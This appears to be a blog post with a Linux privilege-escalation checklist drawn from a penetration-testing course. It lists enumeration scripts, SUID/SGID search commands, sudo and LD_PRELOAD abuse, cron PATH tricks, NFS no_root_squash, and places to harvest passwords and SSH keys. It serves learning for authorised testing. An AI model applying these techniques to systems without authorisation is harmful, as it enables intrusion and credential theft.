Hi There today I published a checklist of strategies on Linux Privilege Escalation by Tib3rius
- Linux Smart Enumeration (lse.sh)
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
see: ./lse.sh -h
- LinEnum
https://github.com/rebootuser/LinEnum
see: ./LinEnum.sh -h
- https://github.com/linted/linuxprivchecker
- https://github.com/AlessandroZ/BeRoot
- http://pentestmonkey.net/tools/audit/unix-privesc-check
1- Kernel Exploits (last choice)
- Ex. searchsploit linux kernel [kernel version] priv esc
- Ex. searchsploit linux kernel [kernel version] [Linux distribution] priv esc
- Or use linux exploit suggester 2 tool with argument -k [kernel version]
2- Services Exploits
- ps aux | grep "^root"
- See the program version to check if its vulnerable --version/-v
- In Debian-like distributions check "dpkg -l | grep "
- Systems that use rpm check "rpm -qa | grep "
- use "netstat -an" to display the current status of TCP and UDP connections & Remember U can use Port Forwarding if it helps to exploit
3- Weak File Permissions
- Writable/Readable /etc/shadow
- Writable /etc/passwd
- Backups
- Some common locations: / (root) directory, /tmp, and /var/backups
4- Sudo
- cat /etc/sudoers
- sudo -l
- Known Password
- https://gtfobins.github.io/
- Abusing Intended Functionality
- env_reset
- env_keep=LD_PRELOAD
- env_keep+=LD_Library_Path
- ldd
5- Cron Jobs
- User Cron table files : /var/spool/cron/ or /var/spool/cron/crontabs/
- Sytem-wide crontab located: /etc/crontab
- PATH Environment exploit
- Wildcards & Filenames
6- SUID / SGID Files
- find / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2>/dev/null
- if bad interpreter error shown we can solve it with command => sed -i -e "s/^M//" exploit
- strace to see missing shared library
- strace [SUID/SGID] 2>&1 | grep -iE "open|access| no such file"
- /bin/sh version (notably Bash <4.2-048) export function
- /bin/sh version (before Bash versions 4.4) SHELLOPTS
7- Passwords
- History Files
- Confing Files
- SSH Keys
8- NFS
- no_root_squash
9- Check for services/ports running inside the machine
- netstat -anop
-
Check your user (id, whoami).
-
Run Linux Smart Enumeration with increasing levels.
-
Run LinEnum& other scripts as well!
-
If your scripts are failing and you don’t know why, you can always run the manual commands from this course, and other Linux PrivEsc cheatsheets online (e.g. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
-
Spend some time and read over the results of your enumeration
-
If Linux Smart Enumeration level 0 or 1 finds something interesting, make a note of it.
-
Avoid rabbit holes by creating a checklist of things you need for the privilege escalation method to work.
-
Have a quick look around for files in your user’s home directory and other common locations (e.g. /var/backup, /var/logs).If your user has a history file, read it, it may have important information like commands or even passwords.
-
Try things that don’t have many steps first, e.g. Sudo, Cron Jobs, SUID files.
-
Have a good look at root processes, enumerate their versions and search for exploits.
-
Check for internal ports that you might be able to forward to your attacking machine.
-
If you still don’t have root, re-read your full enumeration dumps and highlight anything that seems odd.This might be a process or file name you aren’t familiar with, an “unusual” filesystem configured (on Linux, anything that isn’t ext, swap, or tmpfs), or even a username.At this stage you can also start to think about Kernel Exploits.